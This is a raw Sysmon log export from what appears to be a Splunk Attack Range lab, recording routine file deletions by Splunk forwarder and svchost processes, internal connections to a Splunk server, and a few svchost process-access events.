23542300x80000000000000001049309Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:29.495{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D6123476FFB00E492FF4D282FFA90B55,SHA256=1F8C1CB549747708BA7AD0656BA705E7E56A8429EAE58E52778FE304256FFE9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049312Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:30.809{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=492FF4477D791BDE154FBAF473C1828D,SHA256=CA7BBC545E3E779EF57AD70EABBD5F6E3D9E72C5A0C7FF7312BC47495297EB66,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807828Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:30.100{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=B91964A22433510F69D412F2E01CB290,SHA256=C305DDDE0A3AFD20791958CC5FE4EEAE1EE4AF8D093298BBFE936C1F1775EB82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049314Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:31.828{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A127B6582C6544DEBE5822E1A477E13,SHA256=94025E8F0E5D5239EB9E04DDC21DC205A95D9E80D021352B5B105ABF184A6ECA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807830Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:30.295{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57281-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807829Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:31.037{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE57AEF71277F9CCAD2730F48C36054E,SHA256=D2EA02DCE5B34DD6F8F70177DEF8B2D602872DB1F80B46F295CCE6F71CACF91E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049313Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:23.705{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51041-false10.0.1.12-8000- 23542300x80000000000000001049315Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:32.846{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB3EC74EBC7C15ED0E186AE4E5CCA550,SHA256=2AE883EEB6E12F3E01D75DCE82BD781C51C911B099407A5654394FD9591662F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807831Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:32.053{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B933906133169AFE2DCEF5CEA8A27BDE,SHA256=68548914DE526CF72DC83EDCFC26D274ECD4DFD26DC14F0C93AD0C1A2118C897,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049316Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:33.861{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB3C8F67774A0820C556886331A4697D,SHA256=E93DEC46456D86733C5FB809EECE95A6F5BFBDD7674DDCA615B23A85291A4E19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807832Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:33.084{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A747E818EBF45422847C36324B4ECB6C,SHA256=7A7CD254F475C54C8C9A26F36DFFED1B35060A1F2799808F1FBEB07F3B1D00E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049317Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:34.864{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DDDCD7614B3A0B0A7B03FA04C0406D7,SHA256=6559DEC7CC7AB60961E8ABA4DA54C189F8AF95C49F6CE09A84A652E32312671D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807833Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:34.100{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2933270C92C24A0D021193101D8C7A4,SHA256=43F4699B59252A857535ABDC7CA675C52575D7909992B6E1C11B55E41FC297DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049318Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:35.864{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2088830FCF4BB5DBCF310371ABCF423,SHA256=80F8BCFAAE9CAF1826EF6D0520043D475E8EE3E706A4F448E4134497087B234D,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807834Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:35.136{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72D774EF78E03C8009A92EF6692615EC,SHA256=A40C5EBBDF8CF1D7448A637D9498C5D6202A588DD60148D08CEA3E995AB68059,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049320Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:36.879{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCCA72CEBD7E0590D331A347A618DF81,SHA256=2FF678A4107CFB1420A8AC134A915FD5E33F5960300EA230159E5E2902BC0391,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807836Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:35.315{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57282-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807835Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:36.151{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F21A5841F4D298A716694F135423313,SHA256=4ADE88176E9662D49CC559C5EE1FF693C710ED122160A6FDEDBAB502FC916D9A,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001049319Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:28.757{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51042-false10.0.1.12-8000- 23542300x80000000000000001049321Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:37.879{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A46D71CF3E7E438B4E689D3E8E1B2C83,SHA256=5321D48E6DAA773A301C625A233DBD16FAC52A3E77274E00A543871CD151902D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807837Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:37.151{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=732748237F7D1FCD8E287B20F68F3B51,SHA256=B3B0DC9DB24F124078AC20CFA5CE0FA912147E77C244EDB405FFD462E4E71858,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049323Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:38.880{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02A7DD1D8ADE258FE2474CFA835624F6,SHA256=7900EC429BE5FF3A099437D0C71352ACB7512653B4EF0975665C0B666DF2C815,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807838Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:38.198{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C4567DAD3B9A6DF5D7D609596156D17,SHA256=0701F43EAA03C02CF9FBFD2C8D6C2649FD40C86A2E931CF92AFE24D189FB5863,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049322Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:38.547{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=9667158C1C3B9B0888C6C6AD33DE050B,SHA256=0BFFDC06D765BC74B5DDC3E036AED172FF115077AF65BA0444B81F54F871C604,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049324Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:39.880{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B32BB1525BEF83FC5E41ADAEDC91DB64,SHA256=AD62B9A1BCA3736FB3F480BF1259FE6A071949ECB702A5C5B40DAC0B0D77A306,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807839Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:39.245{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=573FA6A2C88C6DD624F543D1AABF10DF,SHA256=00F6C20DB83FFD6EC81024639A8BD5491DC1EB06D71F5F81BF3E298D009202C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049325Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:40.895{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06616A065CF5E7AD61C1544F6EEB3CA7,SHA256=BCDF998796D051095439723F31FB86D89BC950938875F9CE63C29E04E3E1DCA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807840Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:40.292{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A2E33DDEF4FA7B48B9EF2CC7DB6ECC0,SHA256=F56CB686F19B1C5BD92DB8AE565F6FA64A426A4B2AECCA62C3F70A78F52817C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049329Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:41.910{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CFEDE3CC30D52F35BDA5E6D170AF4D6,SHA256=8F4764FE570B35BB8971D52053CE8A49C3D7A9B3D9E50DFF94DF334FE477A4F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807841Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:41.308{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38338F3A137B4F5B5F947FEFC5FEDBA6,SHA256=1C85A3D6223682C4D4FE21B829B4DA0E59019E4D947937F355C4458BCB4F7207,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049328Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:41.447{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049327Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:41.447{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049326Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:41.447{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049331Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:42.912{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCC195C6303F9C3C15268215C2C6A2EC,SHA256=7D48D409A0C6EDD4E4B3FE4CBEF9659EEA063B9FBD350AC13B712D2049872F9B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807843Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:41.206{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57283-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807842Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:42.339{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48EDE0A5AF55F52E177381BFFA4BED4E,SHA256=716011DC70F2F89C2FD082A56CF0930BD7183D9FA0411F1FAFD13E5344857379,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049330Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:34.689{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51043-false10.0.1.12-8000- 23542300x80000000000000001049332Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:43.912{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAA3BB81520F79F05B1453384204D50D,SHA256=6B8DCC4DF250133BAAF29BCAE128F7923844CB3EC2FAE583CEE6F6DFA60A93D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807844Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:43.386{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62CE98414CDC0ED6D90CA7683D379BCE,SHA256=50BE329E848C47EDDCFEA441672730506B36A3F1FA6626411ABEB8F276A5ED17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049333Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:44.949{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE0FE3993B2D45FF9FC656A8076F91A7,SHA256=4DD1723E4161B860AB4B5922FFD82C6A2A1B2800F6BCAA29F5EDE50668C001AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807845Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:44.433{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCD8AE90C4270B3466E7F9596F3CE20F,SHA256=B6B978AFC3F73B97F47FD4C74B61219EACA45A1B3CFFB7DFCD657756B49373CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049334Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:45.964{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8B9A1DC7AE983C93A2A066465DA7F5D,SHA256=F453A0D83814691472AD0D5CA33BD7F111DE2F800AF20681D9746A4371EDC3DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807846Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:45.433{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F04FE726D4FFC7A8BC0A47F193F14AC7,SHA256=8CCFD5E6B5B6365077F3BD156D5A26907DDDE72C09DEF859DD631003648C73DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049335Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:46.994{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94F4D3B8114B0DC162643A3CBB8BBBAA,SHA256=841D2E5D42F4D0C4270F19DF0F535ECAE76C0E2530CC05464B2AB22E76C6315E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807847Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:46.464{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A37B4B3592CC32CB42E64C0662E85D97,SHA256=E54AE6B34980F198DDB718F95687E85E40A9BA4655955EE4F7ED6E52B51299CE,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001049336Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:47.996{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D3E2BE4D453E24BC1CB799C963F7577,SHA256=CC5EE2B91FDDDD599B1FF048E98B6EF113BA9369DC0A1428436886CF81C59482,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807848Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:47.480{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E200021D28692A3B6AC25EE0A38878A1,SHA256=FEE9A6A3B24124299D122E04C9859D548C496D1ACB17AAD224617ED5B719D869,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807850Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:47.190{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57284-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807849Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:48.512{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 